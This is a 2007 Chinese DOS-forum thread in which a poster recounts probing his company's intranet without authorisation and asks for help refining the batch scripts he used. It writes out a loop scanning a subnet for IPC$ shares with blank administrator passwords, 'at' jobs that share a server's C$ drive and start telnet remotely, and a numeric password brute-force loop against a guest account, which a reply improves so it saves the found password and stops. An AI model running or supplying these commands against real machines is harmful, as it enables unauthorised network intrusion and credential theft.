中国DOS联盟

出于无聊，我想测试一下公司内网的安全性 首先用ipconfig 得到本机ip ：192.168.0.45然后 for /L %%g in (1 1 254) do echo %%g >>1.txt & net use \\192.168.0.%%g\ipc$ "" /user:"administrator" | find "命令成功完成'>>1.txt 运行之后，我打开1.txt 看，我惊呆了，居然有一台。 我想进一步于是： 首先建立连接： net use \\192.168.0.212\ipc$ "" /user:"administrator"(192.168.0.212为发现的IP) 显示命令成功完成 我用net time \\192.168.0.212查看对方机器时间 显示时间于我用的一样。 我执行下一步： net use h: \\192.168.0.212\C$显示出错，找不到网络路径 不成功，下步： net view \\192.168.0.212 没有，下一步： copy srv \\192.168.0.212\admin$ 不成功 于是最后一步： at \\192.168.0.212 12:00:00 net share c$ = c:\ 显示命令成功完成 我想这一定是超级用户：于是给他来个： at \\192.168.0.212 12:05:00 net start telnet 显示命令成功完成 之后，我成功TELNET 上去，发现是主机，即公司内网服务器，我呆了。 但我想，看公司前台机器安全怎么样， 一会儿得到了ip:192.168.0.55 却发现administrator 没有任何权限。无意之间在telnet 时得到一个用户名:guest 我于是想到暴力： for /L %%g in (0 1 999999999) do echo %%g >>1.txt & net use \\192.168.0.55\ipc$ %%g /user:"guest" | find "命令成功完成'>>1.txt 运行之后我发现了一个问题：这么大的文件，怎样才能找到“命令成功完成” 我想将这个改良： 即：只将正确的密码输入到：1.txt 且马上停止运行。请高手指点 ───────────────────　版务记录　──────────────────── 执行：lxmxn 标题：求助 请高手看这个批处理 说明：因标题表述过于模糊，不便于论坛的搜索和管理，请在三日内修改标题，否则扣除2点积分 参考：www.cn-dos.net/forum ... 　　　community.csdn.net ... ───────────────────　版务记录　──────────────────── [ Last edited by bjsh on 2007-7-31 at 02:19 PM ]

把 find 去掉吧 大量的 find 会 浪费时间; 直接 for /L %%g in (0 1 999999999) do net use \\192.168.0.55\ipc$ "%%g" /user:"guest" >nul 2>nul && (echo Password:%%g >1.txt & exit)

for /L %%g in (1 1 254) do echo %%g >>1.txt & net use \\192.168.144.%%g\ipc$ "" /user:"administrator" | find "命令成功完成'>>1.txt "命令成功完成' 出现find 参数不对 "命令成功完成"只扫到192.168.144.1就停了

谢谢！ 2楼3楼楼主， 能运行，只不过我将 | find "命令成功完成'>>1.txt 中的"打成 '了，改过来就行了

没人回答4楼的问题啊！！！！！！！！！！！！！！！！1？？？

Originally posted by diangongban at 2007-6-19 03:06 PM: 没人回答4楼的问题啊！！！！！！！！！！！！！！！！1？？？

……看你楼上……